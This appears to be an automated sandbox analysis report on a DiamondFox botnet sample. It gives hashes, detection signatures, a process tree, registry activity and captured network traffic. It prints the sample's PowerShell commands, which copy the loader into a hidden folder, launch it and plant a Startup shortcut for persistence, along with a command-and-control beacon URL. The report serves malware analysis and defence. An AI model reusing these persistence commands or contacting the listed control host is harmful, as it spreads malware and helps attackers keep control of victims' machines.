Analysis
-
max time kernel
150s -
max time network
103s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22/01/2021, 17:28 UTC
Static task
static1
Behavioral task
behavioral1
Sample
1607460946_Loade.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
1607460946_Loade.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
1607460946_Loade.exe
-
Size
140KB
-
MD5
7bf6de1dc69718455fb90e9a30a9183d
-
SHA1
3a7f90978908d56d2b689aede98572581442cb19
-
SHA256
8ca67e40d0d3826efc58feb163760f994eae52731f74c2a3d0d45148a2996bb2
-
SHA512
78d208eb831789a85d3a5920560fa7c7fe1385491830dbc1e6caac35bb7cba66692cdc1d6b9c06f12a80767e1fa78cb56f011ab9e982839976757fd6cc08ccd9
Score
10/10
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral2/memory/648-6-0x0000000000400000-0x000000000041A000-memory.dmp diamondfox behavioral2/memory/648-5-0x00000000001C0000-0x00000000001D8000-memory.dmp diamondfox -
Executes dropped EXE 1 IoCs
pid Process 3992 atiedxx.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\atiedxx.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 90 IoCs
pid Process 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 2592 powershell.exe 2592 powershell.exe 3928 taskmgr.exe 2592 powershell.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 3928 taskmgr.exe Token: SeSystemProfilePrivilege 3928 taskmgr.exe Token: SeCreateGlobalPrivilege 3928 taskmgr.exe Token: SeDebugPrivilege 2592 powershell.exe -
Suspicious use of FindShellTrayWindow 97 IoCs
pid Process 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe -
Suspicious use of SendNotifyMessage 96 IoCs
pid Process 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe 3928 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 648 1607460946_Loade.exe 3992 atiedxx.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 648 wrote to memory of 1924 648 1607460946_Loade.exe 78 PID 648 wrote to memory of 1924 648 1607460946_Loade.exe 78 PID 648 wrote to memory of 1924 648 1607460946_Loade.exe 78 PID 1924 wrote to memory of 3992 1924 powershell.exe 81 PID 1924 wrote to memory of 3992 1924 powershell.exe 81 PID 1924 wrote to memory of 3992 1924 powershell.exe 81 PID 3992 wrote to memory of 2592 3992 atiedxx.exe 82 PID 3992 wrote to memory of 2592 3992 atiedxx.exe 82 PID 3992 wrote to memory of 2592 3992 atiedxx.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe"C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe' -Destination 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe"C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\atiedxx.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe';$shortcut.Save()4⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3928
Network
-
Remote address:8.8.8.8:53Requestip.seeip.orgIN AResponseip.seeip.orgIN A23.128.64.141
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A2.21.41.70
-
Remote address:8.8.8.8:53Requestmilyunir.netIN AResponsemilyunir.netIN A8.209.72.194
-
Remote address:8.209.72.194:80RequestGET /jp/gate.php?ct=1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Keep-Alive: 300
Pragma: no-cache
Accept: text/plain
Accept-Charset: utf-8
Accept-Language: en-us,en;q=0.5
Cookie: 8bc27df988e26d6b
Referer: http://www.microsoft.com/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
Host: milyunir.net
ResponseHTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
40 B 46 B 1 1
-
1.1kB 3.8kB 10 10
-
190 B 92 B 4 2
-
639 B 344 B 5 3
HTTP Request
GET http://milyunir.net/jp/gate.php?ct=1HTTP Response
503
-
58 B 74 B 1 1
DNS Request
ip.seeip.org
DNS Response
23.128.64.141
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
2.21.41.70
-
58 B 74 B 1 1
DNS Request
milyunir.net
DNS Response
8.209.72.194